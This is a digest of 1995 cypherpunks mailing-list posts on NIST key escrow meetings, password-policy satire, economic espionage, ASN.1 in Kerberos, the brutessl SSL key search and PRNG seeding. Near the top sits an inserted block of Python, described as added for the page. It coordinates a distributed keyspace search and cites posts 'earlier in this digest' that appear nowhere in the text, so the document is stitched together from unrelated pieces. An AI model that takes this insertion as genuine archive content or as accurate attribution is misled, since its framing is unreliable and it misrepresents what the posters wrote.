qualifications/considerations are appropriate for approval as a key escrow agent have not been defined. Some of the issues which need to be discussed and resolved include the following: * What kinds of organizations should be excluded from consideration as approved key escrow agents? 
* What sort of legal agreement between the government and the key escrow agent is necessary to stipulate the responsibilities of the agent? Should this include the terms and conditions under which release of a key is required? * How will liability for unauthorized release of key be handled? * Should, for example, intentionally misreleasing or destroying a key be criminalized? Should this include other actions? * How can the government's needs for confidentiality of key release be handled? * Should approval of key escrow agents be tied to a public key infrastructure (for digital signatures and other purposes)? * What procedures need to be developed for the storage and safeguarding of keys? * What are the acceptable performance criteria (e.g., around- the-clock availability, accessibility, reliability, etc.) for approved key escrow agents? * Under what circumstances will key escrow agents in foreign countries be approved? * What process will be used to approve escrow agents? Costs/who pays? --------- (*1) "Approved," for the purposes of this discussion, means that the government (or its agent) has formally granted permission for an organization to hold keys for exportable encryption products. Note: These issues will be discussed at the Key Escrow Issues Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National Institute of Standards and Technology (Gaithersburg, Maryland). The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-mail: carlton at micf.nist.gov. 
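Vladimir Nuri's post earlier in this digest proposes that clients return checksums over the hashes of each keyspace block they searched so the server can spot-check them, that blocks held by silent clients be reallocated, and that chunk sizes adapt to each client's measured speed; Tim May's post asks how much efficiency random, uncoordinated claiming loses against a coordinated search. The Python below is an added example written for this page, not code from the brutessl project or from either poster: the candidate test is a constructed SHA-256 stand-in rather than a cipher trial, and every name in it is hypothetical.

```python
"""Coordinator for a volunteer keyspace search: searched-block evidence,
spot-checking, reallocation of silent blocks, adaptive chunk sizing, and
the expected coverage of random (uncoordinated) block claiming.
Constructed example; every name here is hypothetical."""
import hashlib
import math
import random

BLOCK_SIZE = 256   # candidates per block (tiny, for the example)


def candidate_digest(index: int) -> bytes:
    """Stand-in for "test candidate key number `index`" (constructed:
    a real search would run the cipher; this just hashes the index)."""
    return hashlib.sha256(index.to_bytes(8, "big")).digest()


def search_block(block: int) -> str:
    """Worker side: exhaust one block and return the evidence checksum.
    Producing it requires computing every candidate digest in the block,
    so a client that skipped the work cannot forge it."""
    h = hashlib.sha256()
    for idx in range(block * BLOCK_SIZE, (block + 1) * BLOCK_SIZE):
        h.update(candidate_digest(idx))
    return h.hexdigest()


class Coordinator:
    """Server side: hands out blocks, expires silent workers, spot-checks
    evidence and down-weights workers whose evidence does not verify."""

    def __init__(self, n_blocks: int, spot_check_rate: float = 0.25,
                 seed: int = 1):
        self.pending = list(range(n_blocks))   # blocks nobody holds
        self.assigned = {}                     # block -> (worker, deadline)
        self.verified = set()                  # blocks accepted as searched
        self.rate = {}                         # worker -> blocks per second
        self.reliability = {}                  # worker -> 0.0 .. 1.0
        self.rng = random.Random(seed)
        self.spot_check_rate = spot_check_rate

    def allocate(self, worker: str, now: float, target_seconds: float) -> list:
        """Dole out a processing chunk sized so the worker should report
        back in about target_seconds, using its measured rate (one block
        until we have seen it work)."""
        rate = self.rate.get(worker, 1.0 / target_seconds)
        count = max(1, int(rate * target_seconds))
        blocks = self.pending[:count]
        del self.pending[:count]
        deadline = now + 2 * target_seconds    # slack before reallocating
        for b in blocks:
            self.assigned[b] = (worker, deadline)
        self.reliability.setdefault(worker, 1.0)
        return blocks

    def expire(self, now: float) -> list:
        """Blocks whose deadline passed without a report go back to the
        pool for the next comer."""
        late = [b for b, (_, deadline) in self.assigned.items()
                if deadline < now]
        for b in late:
            del self.assigned[b]
            self.pending.append(b)
        return late

    def report(self, worker: str, block: int, evidence: str,
               seconds: float) -> bool:
        """Accept a worker's result; recompute the block ourselves when the
        dice or the worker's record say so."""
        if self.assigned.get(block, (None, 0))[0] != worker:
            return False                       # not this worker's block
        del self.assigned[block]
        self.rate[worker] = 1.0 / max(seconds, 1e-6)
        suspect = self.reliability[worker] < 0.75
        if suspect or self.rng.random() < self.spot_check_rate:
            if evidence != search_block(block):
                self.reliability[worker] /= 2  # caught: trust it less
                self.pending.append(block)     # and have it searched again
                return False
        self.reliability[worker] = min(1.0, self.reliability[worker] + 0.1)
        self.verified.add(block)
        return True


def random_claim_coverage(n_blocks: int, claims: int) -> float:
    """Expected fraction of the keyspace covered when `claims` blocks are
    picked uniformly at random (overlaps allowed) instead of coordinated.
    With claims == n_blocks this is about 1 - 1/e, roughly 63%."""
    return 1.0 - (1.0 - 1.0 / n_blocks) ** claims


def claims_for_coverage(n_blocks: int, fraction: float) -> int:
    """Random claims needed to reach a given expected coverage; for large
    n_blocks this is about n_blocks * ln(1 / (1 - fraction)), i.e. a
    factor of a few (about 4.6 for 99%) over a perfectly coordinated search."""
    return math.ceil(math.log(1.0 - fraction)
                     / math.log(1.0 - 1.0 / n_blocks))
```

The coverage functions put a number on May's "factor of several": uncoordinated claiming reaches 99% of the keyspace after about 4.6 times as many block-searches as a perfectly partitioned one.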
From carolann at censored.org Wed Sep 20 16:26:55 1995
From: carolann at censored.org (Carolann@censored.org)
Date: Wed, 20 Sep 95 16:26:55 PDT
Subject: THE ILLEGAL MARKETS OF CYBERSPACE
Message-ID: <9509201546275326@ci.diamond-bar.ca.us>

Date: Wed, 30 Aug 1995 02:48:43 -0500
To: cypherpunks at toad.com
From: carolann at censored.org (Censored Girls Anonymous)
Subject: Re: The illegal markets of cyberspace

Thank you for the easy to understand concepts. Now where was that nobody at nobody.org key again?

Love Always, Carol Anne....wondering if the Undernet was as good as the Blacknet?

-- Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
http://dcs.ex.ac.uk/~aba/export/

From alano at teleport.com Wed Sep 20 16:27:05 1995
From: alano at teleport.com (Alano@teleport.com)
Date: Wed, 20 Sep 95 16:27:05 PDT
Subject: [COMP.SECURITY.UNIX] ADVICE ON PASSWORD SECURITY GUIDELINES
Message-ID: <9509201546345375@ci.diamond-bar.ca.us>

Date: Wed, 30 Aug 1995 20:55:24 -0700
To: cypherpunks at toad.com
From: alano at teleport.com (Alan Olsen) (by way of Alan Olsen wrote:
>From: Paul Ashton
>Newsgroups: comp.security.unix
>Subject: Advice on password security guidelines
>Hi,
>my boss has asked me for comments and improvements on his new password
>security policy. To me, it seems a bit severe. If anyone can offer any
>additional suggestions please do, here goes...
>For immediate issue:
>Password changing guidelines V2.2b
>Due to new security policies, the following guidelines have
>been issued to assist in choosing new passwords. Please follow
>them closely.
>Passwords must conform to at least 21 of the following attributes.
>1. Minimum length 8 characters
>2. Not in any dictionary.
>3. No word or phrase bearing any connection to the holder.
>4. Containing no characters in the ASCII character set.
>5. No characters typeable on a Sun type 5 keyboard
>6. No subset of one character or more must have appeared on
> Usenet news, /dev/mem, rand(3), or the King James bible (version 0.1alpha)
>7. Must be quantum theoretically secure, i.e. must automatically change
> if observed (to protect against net sniffing).
>8. Binary representation must not contain any of the sequences 00 01 10 11,
> commonly known about in hacker circles.
>9. Be provably different from all other passwords on the internet.
>10. Not be representable in any human language or written script.
>11. Colour passwords must use a minimum 32 bit palette.
>12. Changed prior to every use.
>13. Resistant to revelation under threat of physical violence.
>14. Contain tissue samples of at least 3 vital organs.
>15. Incontrovertible by OJ Simpson's lawyers.
>16. Undecodable by virtue of application of 0 way hash function.
>17. Odourless, silent, invisible, tasteless, weightless, shapeless, lacking
> form and inert.
>18. Contain non-linear random S-boxes (without a backdoor).
>19. Self-escrowable to enable authorities to capture kiddie-porn people
> and baddies but not the goodies ("but we'll only decode it with a
> court order, honest").
>20. Not decryptable by exhaustive application of possible one time pads.
>Due to the severity of the restrictions, if the password is entered
>incorrectly 3 times at login time, you will be asked if you would like to
>pick a new one.
>Please add guidelines to the above and adjust the minimum conformation
>requirement, if applicable.
>--
>Moderators accept or reject articles based solely on the criteria posted
>in the Frequently Asked Questions. Article content is the responsibility
>of the submitter.
Submit articles to ahbou-sub at acpub.duke.edu. To write >to the moderators, send mail to ahbou-mod at acpub.duke.edu. | Spam is the Devil's toothpaste! | alano at teleport.com | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - Black Art | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From stewarts at ix.netcom.com Wed Sep 20 16:27:09 1995 From: stewarts at ix.netcom.com (Stewarts@ix.netcom.com) Date: Wed, 20 Sep 95 16:27:09 PDT Subject: CIA & ESPIONAGE Message-ID: <9509201546405398@ci.diamond-bar.ca.us> Date: Thu, 31 Aug 1995 02:31:07 -0700 To: cypherpunks at toad.com From: Bill Stewart Subject: Re: CIA & Espionage >> >It was said that Pres. Clinton had given a speech while >> >visiting the CIA HQ in Langley/Virginia. He allegedly >> >said in this speech that obtaining industrial >> >informations has the highest priority and this were the >> >new task for the spies. Did he really say the priority was stealing information from other people, or only protecting Big American Companies from those nasty French Spy Agency persons? (Clinton being who he is, I'd expect him to say a politically correct version of the latter, whether he means the former or not, just like his predecessor.) #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From monty.harder at famend.com Wed Sep 20 16:28:06 1995 From: monty.harder at famend.com (Monty.harder@famend.com) Date: Wed, 20 Sep 95 16:28:06 PDT Subject: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears... 
Message-ID: <9509201546395394@ci.diamond-bar.ca.us>
From: monty.harder at famend.com (MONTY HARDER)
Date: Wed, 30 Aug 95 23:50:00 -0500
Organization: The First Amendment BBS

Regardless of whether Ito allows the tapes into evidence, the public has heard a LEO matter-of-factly discussing the fabrication of evidence against US citizens. We should take advantage of this, by connecting the Fuhrman/Good Ole Boys from BFART bit, and GACK. If my private key must be escrowed with Lawn Forcement Agencies, the very real possibility exists of a Fuhrman using it to forge evidence against me.

In =any= Key Escrow arrangement (including the non-government variety preferred by 4 out of 5 Cypherpunks in a recent survey) there must be a division between encryption keys and signature keys. I recommend that anyone who will be using escrowed keys generate two pairs: First, the signature key, including in the userid some kind of [sig use] identifier (we should settle on a standard abbreviation for this) followed by the encryption key. This way, when a person gets your pubkeys, they get the encryption key =last=, which gets it searched first whenever they PGP -e... something. Whatever arrangements are made for escrowing my encryption key, =nobody= gets my signature key. If I am fired, quit, become brain damaged or dead, my key can never be used by anyone to implicate me in any criminal activity.

Please don't mention to anyone the fact that my signature key can be used to send me something that even the escrow agents can't read....

* --- * Monster at FAmend.Com *

From cwe at csli.stanford.edu Wed Sep 20 16:29:25 1995
From: cwe at csli.stanford.edu (Cwe@csli.stanford.edu)
Date: Wed, 20 Sep 95 16:29:25 PDT
Subject: SSL and MIPS...
Message-ID: <9509201546275319@ci.diamond-bar.ca.us>

Date: Tue, 29 Aug 1995 23:03:59 -0700
From: Christian Wettergren

Hi! How much computing power did we actually use, in terms of MIPS/FLOPS*hours?
An unloaded SS10 that didn't swap went at approximately 16400 keys/s. How many MIPS is an SS10 approximately? How do different algorithms compare? DES, RC40, RSA512 etc? Or if I pose the question differently, what can you do with 30 GIPS for a day?

/Christian

From shamrock at netcom.com Wed Sep 20 16:29:25 1995
From: shamrock at netcom.com (Shamrock@netcom.com)
Date: Wed, 20 Sep 95 16:29:25 PDT
Subject: NIST KEY ESCROW MEETING
Message-ID: <9509201546335369@ci.diamond-bar.ca.us>

Date: Wed, 30 Aug 1995 19:58:52 -0800
To: cypherpunks at toad.com
From: shamrock at netcom.com (Lucky Green)
Subject: Re: NIST Key Escrow meeting

At 7:51 8/30/95, Flame Remailer wrote:
>Subject: NIST Key Escrow Meeting Discussion Papers
>
>Key Escrow Issues Meeting, September 6-7, 1995
>Discussion Paper #1

[Old and new GAK requirements elided]

>With your input, we are hopeful that this effort will lead to
>definitive criteria, which will facilitate the development of
>exportable products and help minimize the time required to obtain
>export licenses. The Administration seeks to finalize such
>criteria and make formal conforming modifications to the export
>regulations before the end of 1995.
>
>
>Note: These issues will be discussed at the Key Escrow Issues
>Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
>the National Institute of Standards and Technology (Gaithersburg,
>Maryland). The meeting will be open to the public, although
>seating is limited. Advance registration is requested, please
>contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
>mail: carlton at micf.nist.gov.

Will any Cypherpunks attend this meeting? I sure hope we get to make our ideas known.

-- Lucky Green PGP encrypted mail preferred.
From sjb at austin.ibm.com Wed Sep 20 16:29:25 1995 From: sjb at austin.ibm.com (Sjb@austin.ibm.com) Date: Wed, 20 Sep 95 16:29:25 PDT Subject: A problem with anonymity Message-ID: <9509201546465435@ci.diamond-bar.ca.us> Date: Thu, 31 Aug 1995 18:32:01 -0500 From: Scott Brickner I was thinking about some issues related to electronic commerce, and it occurred to me that there is a significant problem in conducting business with untraceable pseudonyms (anonyms?). The problem occurred to me while considering inheritance. If one operates a business under an anonym (as opposed to the sort of conditionally traceable pseudonym proposed by AT&T in "Anonymous Credit Cards" ), there's a strategy for transferring unlimited funds to one's posterity. Consider a business which typically has a lot of assets, but which are offset by a lot of liabilities --- almost any sort of VAR will do, for instance. In your will, you leave the key to unlock a private message to your heir, in which you hand over the information necessary to assume your anonym. Since the heir presumably has his own identity (whether anonymous or not is immaterial, except to *his* heirs), and the anonym can't be linked to you, he has no reason to care about maintaining the reputation of the anonym. In dismantling the anonym, he sells its assets to his own identity at a fraction of their worth, and defaults on the liabilities. Since the anonym behaved reputably during its life, it developed what would have been a credit-worthy reputation, had it been a (traceable) pseudonym. But, since there's nothing to link the anonym to its heirs (or ancestors), the creditors of the anonym must eat the loss. 
Since the process of taking an anonym from scratch to a positive reputation would be reasonably short (presumably not too much longer than taking a real name or pseudonym the same distance), especially when helped along by being fed the profits from the legitimate business of an ancestor anonym, it's likely that a single individual could pull off such an asset transfer at least two or three times a decade, as well as at inheritance time. A market which permits anonyms to have credit based on reputation will probably have a constant stream of defaults caused by such behavior, representing a significant risk factor in extending credit to anonyms which can't be predicted by reputation.

Comments?

From frissell at panix.com Wed Sep 20 16:29:33 1995
From: frissell at panix.com (Frissell@panix.com)
Date: Wed, 20 Sep 95 16:29:33 PDT
Subject: MORE DISINTERMEDIATION
Message-ID: <9509201546295337@ci.diamond-bar.ca.us>

Date: Wed, 30 Aug 1995 10:33:33 -0400
To: cypherpunks at toad.com
From: Duncan Frissell
Subject: More Disintermediation

According to Monday's USA Today, the Customs Service has come up with a plan to stop stopping international travelers arriving at US airports. Apparently they can't afford "personal" service any more. With 60 million arrivals, Customs has decided to mingle a bit in luggage claim, look for those meeting its profiles, and use drug- and food-sniffing dogs to catch smugglers. Note that international travel has doubled in the last few years. What is Customs (and La Migra) going to do when it doubles again? It is much easier for market phenomena like this to double or triple than it is for government agencies to double or triple. Markets scale well. Governments don't.

DCF

"When foreigners steal 'our' jobs, our labor is freed for other tasks and total world product increases. Jobs can no more 'run out' than desire for things in general can 'run out'."
From goedel at tezcat.com Wed Sep 20 16:29:35 1995
From: goedel at tezcat.com (Goedel@tezcat.com)
Date: Wed, 20 Sep 95 16:29:35 PDT
Subject: SSL SUGGESTIONS
Message-ID: <9509201546285327@ci.diamond-bar.ca.us>

Date: Wed, 30 Aug 1995 03:14:10 -0600
To: cypherpunks at toad.com
From: goedel at tezcat.com (Dietrich J. Kappe)
Subject: SSL Suggestions

Many people have suggested improvements to the technical side of brutessl. I don't think anyone has looked at the user interface side of things. A simple configure script, and a few more reasonable defaults would bring quite a few more volunteers. I know of at least a handful of people who did not contribute because they were overwhelmed by the unfriendly scripts. While a rough user interface could serve as a basic intelligence test, I don't think that this sort of exclusion is necessary, given the nature of the task.

DJK

Dietrich J. Kappe  | Red Planet           http://www.redweb.com/
Red Planet, L.L.C. | "Chess Space"        /chess
1-800-RED 0 WEB    | "MS Access Products" /cobre
Web Publishing     | PGP Public Key       /goedel/key.txt

From hallam at w3.org Wed Sep 20 16:37:02 1995
From: hallam at w3.org (Hallam@w3.org)
Date: Wed, 20 Sep 95 16:37:02 PDT
Subject: CIA & Espionage
Message-ID: <9509201546295340@ci.diamond-bar.ca.us>

Date: Wed, 30 Aug 95 11:16:01 -0400
From: hallam at w3.org

>In a German weekly news magazine (Focus 34/1995, p. 178-181) I read an article about industrial espionage. It is said that the secret services have lost their main task when the east/west cold war had gone. Their new task is the industrial espionage. The Russian, French, and American services were referenced in the article.

The cold war isn't so decisive. Much of espionage has always been industrial.
It is an essential component of political espionage in any case. Military espionage may get the headlines, but the bulk of the work is trawling through trade stats and various open networks in embassies etc. In any case, with the breakup of the USSR there are now more states to watch, and because they are unstable more need to watch them.

Phill

From tcmay at got.net Wed Sep 20 16:55:13 1995
From: tcmay at got.net (Tcmay@got.net)
Date: Wed, 20 Sep 95 16:55:13 PDT
Subject: ECONOMIC ESPIONAGE?
Message-ID: <9509201546345376@ci.diamond-bar.ca.us>

Date: Wed, 30 Aug 1995 22:22:13 -0700
To: cypherpunks at toad.com
From: tcmay at got.net (Timothy C. May)
Subject: Economic Espionage?

At 1:25 AM 8/31/95, Tatu Ylonen wrote:
>> >It was said that Pres. Clinton had given a speech while visiting the CIA HQ in Langley/Virginia. He allegedly said in this speech that obtaining industrial information has the highest priority and this was the new task for the spies.
>
>There was a fairly large article about this in Helsingin Sanomat, the largest newspaper in Finland, some weeks ago. It was quoted as being originally from the New York Times. (I have the clip saved at home and can check the date if anyone is interested.)
>
>I do find it rather shocking that the most powerful country in the world sets industrial espionage as the primary task of their intelligence services.

What confirmation can you give us for this statement? I'd like to see the actual comments, not just second-hand reports.

The issue of economic surveillance has come up several times, and I know of no formal policy to institute such a program. The U.S., with generally multiple competitors in each market, would have a hard time figuring out who to tell "foreign secrets" to. Would Ford be told? Or just General Motors? What about companies with operations in multiple countries?
Former DIRNSA (Director of the NSA) William Odom has said repeatedly that economic espionage cannot plausibly be a central task of the NSA.

Before anyone accuses me of being an apologist for the NSA (usually these claims arrive anonymously), I've been looking for evidence of an economic intelligence role or mission of the U.S. intelligence agencies for more than 7 years.

Let's see some evidence.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From piete.brooks at cl.cam.ac.uk Wed Sep 20 16:55:46 1995
From: piete.brooks at cl.cam.ac.uk (Piete.brooks@cl.cam.ac.uk)
Date: Wed, 20 Sep 95 16:55:46 PDT
Subject: Article in the Guardian (UK) about Hal2 not bad ....
Message-ID: <9509201546385387@ci.diamond-bar.ca.us>

Date: Thu, 31 Aug 1995 08:00:07 +0100
From: Piete Brooks

An article by Azeem Azhar on page three of today's "The Guardian Online" (he tells me it is available only in paper form!) is fairly positive. He puts over the main point: "since US government regulations prevent the export of software that uses stronger cryptographic techniques".

From hallam at w3.org Wed Sep 20 17:16:30 1995
From: hallam at w3.org (Hallam@w3.org)
Date: Wed, 20 Sep 95 17:16:30 PDT
Subject: Whitehouse "dissident" and net monitoring
Message-ID: <9509201551016603@ci.diamond-bar.ca.us>

Date: Wed, 13 Sep 95 11:18:14 -0400
From: hallam at w3.org

>> >(4) Is the April 9 statement by David Lytel of the White House Office of Science and Technology to Amy Bauer of Copley News Service that the administration does not monitor anti-Clinton activity on the web still operative?
>
>Probably they do and they really should.
>If I was Mr. Clinton (which I luckily am not) I would want my adjutants to prepare a report for me each morning summing up all the possible comments round subject Clinton and The USA from NET: That would be a very precious source of feedback to fine-tune your acts. And that information is real time.

Nope, they don't; the Democratic party aides do that type of work from Democrat HQ. The President gets a once a week summary of all the mail he gets, including the email. I think they also provide a daily press digest.

By monitoring, Lytel was probably thinking about installing net sniffers etc. or obtaining the data from the FBI or whoever. I am certain he didn't mean to say that he does not surf the net ever and does not occasionally visit opposition sites. The term monitor implies an organised search and continuous checking procedure; the number of hits cited sounds more like someone passed round the URL of a kook site inside the office.

Phill

From jis at mit.edu Wed Sep 20 17:16:36 1995
From: jis at mit.edu (Jis@mit.edu)
Date: Wed, 20 Sep 95 17:16:36 PDT
Subject: ASN.1 AND KERBEROS VERSION 5
Message-ID: <9509201547165561@ci.diamond-bar.ca.us>

Date: Sat, 2 Sep 1995 13:55:38 -0400
To: cypherpunks at toad.com
From: jis at mit.edu (Jeffrey I. Schiller)
Subject: ASN.1 and Kerberos version 5

Perry E. Metzger writes:
>I've heard people associated with the decision to use ASN.1 in Kerberos V say it was a mistake. Frankly, I think ASN.1 is a blight which should be exterminated from the planet.

I'll say it. I was the person who pushed for the use of ASN.1 in Kerberos version 5. I had this disease at the time that made me think that ASN.1 was a good idea. I got better; unfortunately we have been living with the results of my braino for quite some time now... poor Ted.

However, the problem with ASN.1 isn't its waste of space (which actually isn't that bad for a mechanism for encoding arbitrary objects).
The problem is that it is the product of a standards making process that didn't (and doesn't) value interoperability. Adherence to the ISO specifications does not guarantee interoperation. Instead regional "workshops" negotiate aspects of implementations to obtain interoperation.

What does this mean for ASN.1? It means that the definition of ASN.1 is a bit abstract (as its name implies). Problems result when two organizations (say MIT and OSF!) attempt to implement from the specification in ASN.1 but use different ASN.1 compilers and things then don't work. Arguments then ensue about whose compiler (or manually written parsing code) is "correct" in terms of doing the right thing with ASN.1. This is particularly so when using DER (for Distinguished Encoding Rules) which is itself an after-thought added to ASN.1 later in the process. It is required in order to verify digital signatures (which have to be computed on the "encoded" form of an object because there is no good way to calculate a signature on an "abstract" object).

If the Kerberos specification said: "put this byte here and that one there" none of these arguments and problems would happen.

-Jeff

From alano at teleport.com Wed Sep 20 17:16:55 1995
From: alano at teleport.com (Alano@teleport.com)
Date: Wed, 20 Sep 95 17:16:55 PDT
Subject: CRYPTOGRAPHY ELIMINATES LAWYERS?
Message-ID: <9509201549496270@ci.diamond-bar.ca.us>

Date: Sat, 09 Sep 1995 12:41:12 -0700
To: cypherpunks at toad.com
From: Alan Olsen
Subject: Re: cryptography eliminates lawyers?

At 02:44 PM 9/8/95 -0400, you wrote:
>We wish! We really wish!

"Fill that lawyer with a few more slugs of encryption!"
The argument that encryption will free us from all the legal ills of the world is pretty specious. If anything it will make more work for lawyers as the non-clue-endowed portion of the world tries to come to terms with the new technology. They will make rules and subsets of rules and exceptions to rules and variations to interpretations of rules that will make the current set look like the rules to "chutes and ladders".

Part of the job of the lawyer class is to guarantee the existence of work for other lawyers (as well as themselves). It does not depend on what the medium of exchange is. Lawyers and government forces will try and figure out some way to try and extract it from you.

The government is trying very hard to keep any scrap of power from creeping away from them. You can bet that they will try every thing they can think of, rational and irrational, to regulate and control the wilds of cyberspace. They will pump up every imaginary boogieman to help them get the public to swallow what they are fed. By the time they figure out they have been had, it will be too late.

Cypherpunks must be the syrup of ipecac to the government's dose of poison to the body politic!

(I need to start drinking more coffee in the morning. I cannot believe I wrote that...)

Unfortunately the public does not thrive on logic. They had been trained to react emotionally to things and not react logically. I am not certain what can be used to get them to realize why they need encryption. Dispelling the bogeymen is one need.

The other thing is that the tools need to be made as simple as possible. The current tools for use require a fair bit of technical understanding. Until they have an integrated front-end that makes it about as easy to use as America On-Line, encryption will not gain widespread usage. This is the type of code that needs to be written. Making integrated tools like newsreaders and mail programs that support strong encryption directly is what is needed for widespread use.
(As well as being usable programs in and of themselves. Many of the programs for news and mail are crap.)

Making cryptography a "cool and fun thing to use" will help dispel many of the myths and may help to defuse the government-created bogey men. (Of course they will claim that it aids "criminals and terrorists", but to them EVERYONE is a criminal and a terrorist.)

| Visualize whirled keys                          | alano at teleport.com |
|"It's only half a keyserver. I had to split the  | Disclaimer:         |
|other half with the government man." - Black Art | Ignore the man      |
| -- PGP 2.6.2 key available on request --        | behind the keyboard.|
| http://www.teleport.com/~alano                  |                     |

From anonymous at freezone.remailer Wed Sep 20 17:17:24 1995
From: anonymous at freezone.remailer (Anonymous@freezone.remailer)
Date: Wed, 20 Sep 95 17:17:24 PDT
Subject: SMART CARDS, CREDIT CARDS, PAYMENT SYSTEMS
Message-ID: <9509201551476821@ci.diamond-bar.ca.us>

Date: Fri, 15 Sep 1995 09:14:45 -0400
To: cypherpunks at toad.com
From: anonymous at freezone.remailer
Subject: Smart Cards, Credit cards, Payment systems

URL: http://www.dice.ucl.ac.be/~dhem/card.html

Smart Cards, Credit cards, Payment systems.

This page is under development.
Card Europe
DigiCash
MasterCard
Futur 1, 2
Virtual Open Network Environment (V-ONE)
MONDEX
AT&T and GiroVend agree to promote smart card applications
AT&T Universal Card Services
ATT buyinfo
ibd.ar.com/lists/comp/cypherpunks
Discussions, mailing lists, and sites
Payment mechanisms designed for the Internet
News items on information technology (Not especially Smart Cards)
Electronic Cash, Tokens and Payments in the National Information Infrastructure
Forum On Risks To The Public In Computers And Related Systems (ACM)
The Risks Digest Volume 4: Issue 32
The Risks Digest Volume 15
The Risks Digest Volume 16
SMI Finger Check -- Fingerprint Verifier
DIGITAL SRC Research Reports
Authentication and Delegation with Smart-cards
Innovonics
QC consultancy
University of Wollongong: Centre for Computer Security Research
SecureWare, Inc.
OKI Telecom
(Smart) Cards Museum (big)
Buying Prepaid Calling Card
S. Brands
Cyberbank '95
Electronic benefits transfer (EBT) in US
NCSA/DTIC Security Seminar
Power Broker
First Union Corp. will offer stored-payment ''smart cards''
Network Payment Mechanisms and Digital Cash
PCMCIA Cards
THE PREPAID & RECHARGEABLE PHONE CARD
Cardservice International

UCL crypto group

Last update: 11 September 1995. Send any comment to: Dhem at dice.ucl.ac.be (J.-F. Dhem)

From mr.xxx at ce.flashnet.it Wed Sep 20 17:17:40 1995
From: mr.xxx at ce.flashnet.it (Mr.xxx@ce.flashnet.it)
Date: Wed, 20 Sep 95 17:17:40 PDT
Subject: No Subject
Message-ID: <9509201546595494@ci.diamond-bar.ca.us>

Date: Fri, 1 Sep 1995 21:00:32 +0200
To: cypherpunks at toad.com
From: Pasquale Piombino

Hi all, I am searching PGP software. Does anyone know where I can download it? Thanks for answers.

-+-+------------------->->--------------------------------:-Q------------
° Pasquale Piombino                                                     |
| Via Colombo, 35           Email: mr.xxx at ce.flashnet.it               °
° I-81100 CASERTA           Phone - Fax: 0039 823 329152                |
| ITALY                                                                 °
+-+-------------8-)---------------------:-))-----------------:-o---------

From joelm at eskimo.com Wed Sep 20 17:17:59 1995
From: joelm at eskimo.com (Joelm@eskimo.com)
Date: Wed, 20 Sep 95 17:17:59 PDT
Subject: NIST ESCROW PAPERS - NOW WEB AVAILABLE
Message-ID: <9509201549226130@ci.diamond-bar.ca.us>

Date: Thu, 07 Sep 1995 21:28:59 -0700
To: cypherpunks at toad.com
From: Joel McNamara
Subject: NIST Escrow Papers - Now Web Available

Several of the scanned hand-outs (courtesy of John Young) for the NIST Septembe
http://www.eskimo.com/~joelm

Papers include:

The outlines of meeting topics of Raymond Kammer of NIST and Michael Nelson of
Discussion Paper No.
4, "Example Potential Solutions for the Draft Export Crite
The Business Software Alliance's dissenting blast at the government's key escro
Trusted Informations Systems's "Thoughts on the NIST Escrow Issues Meeting Disc
TECSEC Incorporated's "Private Escrow Key Management: A Method and its Issues."
Dorothy Denning's "Comments on Draft Criteria for Software Key Escrow Exportabi

From hallam at w3.org Wed Sep 20 17:18:04 1995
From: hallam at w3.org (Hallam@w3.org)
Date: Wed, 20 Sep 95 17:18:04 PDT
Subject: Is the book Network Security any good?
Message-ID: <9509201546335370@ci.diamond-bar.ca.us>

Date: Wed, 30 Aug 95 22:53:49 -0400
From: hallam at w3.org

>Has anyone read the book "Network Security Private Communication in a PUBLIC World" yet? It's by Charlie Kaufman, Radia Perlman, and Mike Speciner, and has a copyright date of this year.

It's pretty good on security and structure of protocols. Makes a good companion to the Schneier book. I use it frequently.

It does have some very irritating assertions concerning ASN.1 however, specifically concerning its use in Kerberos. I consider Kerberos's use of ASN.1 to be far superior to the alternative suggested, which is pure lossage. Lambasting the use of ASN.1 is fair game, but arguments over wasted bytes miss the point of ASN.1 and the BER encoding entirely.

It would make a useful course book.

Phill

From daw at CS.Berkeley.EDU Wed Sep 20 17:18:06 1995
From: daw at CS.Berkeley.EDU (David_A Wagner)
Date: Wed, 20 Sep 95 17:18:06 PDT
Subject: NYT on Netscape Crack
Message-ID: <199509202353.QAA20322@guaymas.CS.Berkeley.EDU>

In article <9509201034.AA10521 at prakinf.tu-ilmenau.de> you write:
> Is it a good idea to use different (unrelated!) seeded PRNG's for the challenge data (which can be seen by sniffing) and the masterkey (which should never leave out of client's memory?

No.
If the master key PRNG is poorly seeded, this is still exploitable: for instance, there is a lot of redundancy in most plaintext, and this can be used to check each candidate key value.

Just use a cryptographically secure PRNG seeded with enough entropy.

From andrew.spring at ping.be Wed Sep 20 17:18:23 1995
From: andrew.spring at ping.be (Andrew.spring@ping.be)
Date: Wed, 20 Sep 95 17:18:23 PDT
Subject: BIZDOS CITIZENSHIP?
Message-ID: <9509201549586314@ci.diamond-bar.ca.us>

Date: Sun, 10 Sep 1995 22:11:28 +0100
To: cypherpunks at toad.com
From: Andrew.Spring at ping.be (Andrew Spring)
Subject: Re: Bizdos citizenship?

>In correspondence with someone outside the US regarding ITAR regulations, the remark was made that Jim Bizdos was Greek and not a U.S. citizen. Is this statement in the same class as an Elvis sighting? Or if it is true, what impact would ITAR have on foreign nationals working for a US company involved with export restricted crypto?
>
>Please don't get carried away and turn this into a Net rumor. I'm just curious if anyone on the list can confirm or deny the citizenship comment.

